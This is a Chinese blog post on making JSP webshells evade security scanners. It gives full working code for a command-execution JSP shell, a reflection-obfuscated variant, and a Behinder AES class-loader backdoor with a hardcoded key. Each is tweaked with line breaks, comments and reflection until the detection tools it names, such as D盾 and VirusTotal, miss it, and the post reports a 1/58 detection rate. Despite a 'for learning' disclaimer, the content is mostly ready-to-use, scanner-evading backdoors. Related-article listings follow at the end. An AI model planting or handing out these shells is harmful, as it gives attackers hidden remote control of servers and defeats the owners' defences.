过d盾 jsp webshell+冰蝎免杀马探讨

已于 2022-07-19 18:01:44 修改
阅读量2.4k 收藏 11
点赞数 2
分类专栏: 安全 免杀 文章标签: java jvm 开发语言
于 2022-07-19 17:59:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/125877699
版权

前言:
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题
就能bypass webshell的查杀了

当然现在的有些厂商直接强标识<%%>这种就要el去绕咯

基础小马bypass

bypass1 一个换行特性导致的bypass

最开始四级
image.png
换行特性后即完美bypass(所以我才说如果是小马的话可以说是贼好bypass)

<%@ page language="java" pageEncoding="UTF-8" %>
<%
    Runtime rt = Runtime.getRuntime();
    String cmd = request.getParameter("cmd");
    Process process = rt.
exec(cmd);
    java.io.InputStream in =
 process.getInputStream();
    out.print("<pre>");
    java.io.InputStreamReader resultReader
 = new java.io.InputStreamReader(in);
    java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
    String s = null;
    while ((s = stdInput.readLine()) != null) {
        out.println(s);
    }
    out.print("</pre>");
%>

d盾
image.png
长亭
image.png
河马
image.png
百度
image.png
vt
image.png

bypass2 反射+反转的思路(这个不是我写的 觉得这个思路不错而且也还免杀就扔给师傅们玩了)

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
String x = request.getParameter("x");
if(x!=null){
	Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
	Method gr = rt.getMethod(reverseStr("emitnuRteg"));
    Method ex = rt.getMethod(reverseStr("cexe"), String.class);
	Process e = (Process) ex.invoke(gr.invoke(null),  x);
	java.io.InputStream in = e.getInputStream();
	int a = -1;
	byte[] b = new byte[2048];
	out.print("<pre>");
	while((a=in.read(b))!=-1){
		out.println(new String(b));
	}
	out.print("</pre>");
}
%>

d盾
image.png
百度
image.png
长亭
image.png
vt
image.png
河马
image.png

冰蝎bypass

这里主要来玩一下冰蝎bypass 因为这个马的特征被大佬们玩的差不多了 不过还是可以碰一下玩的
这里扔一个bypass vt查杀率1/58的 其他全过
冰蝎正文:
最开始的

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().equals("POST")){
String k="e45e329feb5d925b";
session.putValue("u",k);
Cipher c=Cipher.getInstance("AES");
c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
String input= request.getReader().readLine();
new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(input))).newInstance().equals(pageContext);
}%>

效果d盾直接就查了 5级后门
image.png
加入java的换行特性+

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b)
{return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().
equals("POST")){
String k="e45e329feb5d925b";
session.
putValue("u",k);
Cipher c=Cipher.
getInstance("AES");
c.init(2,new SecretKeySpec

(k.getBytes(),"AES"));
String input= request.
getReader()
.readLine
();
new U(this.getClass()
.getClassLoader()
).g(c.doFinal(Base64.getDecoder()
.decode(input)))
.newInstance()
.equals(pageContext);
}%>

变成2级 可疑文件了
image.png
引入注释符 后面根据研究单纯的unicode+换行+注释符啥的都只能bypass2级的效果

image.png
还是二级效果
image.png
冰蝎仍可连
image.png
那就只能做下定位看看这个可疑定的是哪条了
然后当把最后一条代码删除时
就不报了 即核心本质就是要改最后一段的特征
image.png
即这串代码
在删除里面的细节然后想办法进行替换

new U(this.getClass()
.getClassLoader()
).g(c.doFinal(Base64.getDecoder()
.decode(input)))
.newInstance()
.equals(pageContext);

结合反射特性进行bypass
几个替换

this.getClass().getClassLoader()
//替换为
ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();Base64.getDecoder().decode(input)
//替换为  
byte[] bytes=(byte[]) Base64.getDecoder().decode(input);
③c.doFinal()
//替换为
Class clazz2=Class.forName("javax.crypto.Cipher");
byte[] clazzBytes=(byte[]) clazz2.getMethod("doFinal",byte[].class).invoke(c,bytes);

最后替换后bypass的马
除vt以外其他的都完美过 vt其实也能完美过 在多个类即可bypass完美的(有兴趣的话师傅们可以研究下)

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.BASE64Decoder"%>
<%!class U extends ClassLoader
{
    U(ClassLoader c){super(c);
    }
    public Class g(byte []b)
    {
    return super.defineClass(b,0,b.length);
    }
}%>
<%if (request.getMethod().equals("POST"))
{
    String k="e45e329feb5d925b";
    session.putValue("u",k);
    Cipher c=Cipher.
getInstance("AES");

    c.init(2,
new SecretKeySpec
(k.getBytes()
,"AES"));
    ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
 String input= request.
getReader()
.readLine
();
    
    
    byte[] bytes=(byte[]) Base64.getDecoder().decode(input);
    Class clazz2=Class.forName("javax.crypto.Cipher");
    byte[] clazzBytes=(byte[]) clazz2.getMethod("doFinal",byte[].class).invoke(c,bytes);
    Class clazz=new U(contextClassLoader).
g(clazzBytes);
    clazz.newInstance().equals(pageContext);
}%>

d盾查杀率
image.png
vt查杀率
查杀率1/58
image.png
长亭
image.png
百度的(有一说一 这个的jsp查杀效果真不行 乱过)
image.png
河马
image.png

goddemon
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
JSP Webshell
悦分享
08-01 1621
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
DuckMemoryScan:检测绝大部分所谓的内存
03-04
DuckMemoryScan 一个简单寻找包括不限于iis劫持,无文件木,shellcode后门的工具,由huoji花了1天编写,编写时间2021-02-24 !!!!!!!!!!!!!!!!!!!!!!!!! ,不要执行32位编译!!! !!!本工具不能代替毒软件!!! 运行截图 功能列表 HWBP hook检测检测线程中所有疑似被hwbp隐形链接 内存shellcode检测(metasploit,Cobaltstrike完全检测) 可疑进展检测(主要针对有逃避性质的进展[如过期签名与多部分细分段]) 无文件落地木检测(检测所有已知内存加载木) 简易rootkit检测(检测证书过期/拦截复制/证书无效的驱动) 检测异常模块,检测绝大部分如“ iis劫持”的后门(2021年2月26日添加) 检测原理: 所有所谓的内存后门大部分基于“ VirtualAlloc”函
JSP一句话后门
10-31
JSP一句话后门
Webshell工具(附加:流量混淆)
最新发布
Fly_鹏程万里
05-28 480
XGNTAI用于实现Webshell、流量加密传输,生成、哥斯拉等Webshell的PHP、JSP文件,生成流量加密传输配置文件。
JSP
hackzkaq的博客
10-20 491
针对PHP可通过监测核心的eval函数进行查,但是JSP的查目前还没有很好的监测办法,除上述的利用进行外,还可通过创建Runtime的父类等方式。笔者水平有限,欢迎大家指出问题。`m 9`竟然是敏感词,我把文中的换成了@@@,大家自行替换即可。原文地址:https://www.freebuf.com/articles/web/355975.html。
JSP webshell——JSP的基础
weixin_46601374的博客
06-29 1725
唉,每次开启JSP都要好一会儿。话说我也不知道为啥,我的每次开启条件一次比一次苛刻。一开始必应就可以打开,再后来只能由谷歌打开,现在可好了得开着代理用谷歌才能进去。在标记符号之间声明变量,定义方法以及定义类。 标记符号的内容习惯上放在JSP 页面指令之后,之前,也可以写在与之间。之间声明的变量在整个JSP页面内都有效,与标记符在JSP页面中所在的书写位置无关,但习惯上把 标记符写在JSP页面的前面。●一个JSP页面可以...
webshelljsp
tomyyyyy
11-26 2541
webshelljsp 转载自webshell研究 原理 向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。 结构 实现三步 数据的传递 执行所传递的数据 回显 数据传递 String x = request.getParameter("x"); 执行所传递的数据 Class rt = Class.forN...
改造,实现之default_aes php
realmels的博客
12-17 1215
之前发的文章有人说失效了。确实失效了。shellcode的失效了,webshell了。按理说我应该把之前的文章删掉。但是我不仅没有删,还开了一个专栏叫。因为这种东西,就是提供一个思路。你顺着这个思路,自己对你的shellcode或者webshell进行改造。然后不要发到网上去。发到网上去就会被waf的爬虫找到,然后你的就失效了。我在写之前的文章就料到有这样一天。
D盾-webshell检测必备工具
07-09
D盾的功能比较强大, 最常见使用方式包括如下功能:1、查webshell,隔离可疑文件;2、端口进程查看、base64解码以及克隆账号检测等辅助工具;3、文件监控。第一个是D盾的主要功能,后面功能是D盾的辅助功能,但是...
强大的webshell管理工具——
12-26
:强大的WebShell管理工具】 在网络安全领域,WebShell是一种常见的攻击手段,它允许攻击者通过在目标服务器上部署后门程序来控制或监控网站。(Behinder)是一款专为WebShell管理设计的强大工具,它以其...
webshell,
08-18
在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 主要的事情说三遍
华夏webshell
08-13
webshell webshell webshell webshell
最新超级的五次后门
04-13
五次后门大家都知道的啊!~~~~~~~~~~~~~~~~~~~~~~~~~~~~
过waf最新版.zip
08-21
渗透安全过安全狗各种WAF,
webshell不死僵尸大
10-06
webshell不死僵尸大(去后门本人专用)
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
V4.1Behinder
03-11
V4.1 Behinder】是一款知名的Webshell工具,主要用于网络安全测试和渗透测试领域。Webshell,也称为Web后门,是一种通过Web应用程序漏洞植入的恶意代码,允许远程控制服务器。(Behinder)是这类工具的...
webshell-venom-master一些
04-13
Webshell Venom Master中的是指设计时考虑了这些技术,以提高其在目标环境中的生存能力。 3. **编程语言**:Webshell Venom Master包含了多种编程语言的Webshell示例,如PHP、Python、ASP、JSP等。每种语言都...
一个JSP的源码
weixin_30763455的博客
08-07 1344
<% /** JFolder V0.9 windows platform @Filename: JFolder.jsp @Description: 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能弱多了。 @Author: Steven Cee @Email : cqq1978@Gmail.com @Bugs : 下载时,中文文件名无法正常显示 */ %&...
webshell管理工具应该怎么安装
05-14
是一款常用的WebShell管理工具,它可以帮助管理员进行WebShell的检测、管理和清除等操作。以下是安装的步骤: 1. 下载的安装包,可以在官网(https://github.com/rebeyond/Behinder/releases)下载最新版的安装包。 2. 解压安装包,将所有文件放在Web服务器的任意位置,比如放在Web根目录下的“behinder”文件夹。 3. 修改“behinder”文件夹下的“index.jsp”文件,将其中的密码改为自己指定的密码。 4. 在Web浏览器中输入Web服务器地址和“behinder”文件夹的路径,比如“http://example.com/behinder/index.jsp”。 5. 在登录页面输入自己设置的密码,登录成功后就可以使用进行WebShell管理了。 需要注意的是,在使用进行WebShell管理时,一定要注意安全性,避被黑客利用。比如,可以通过设置访问密码、限制IP地址等方式来增强安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值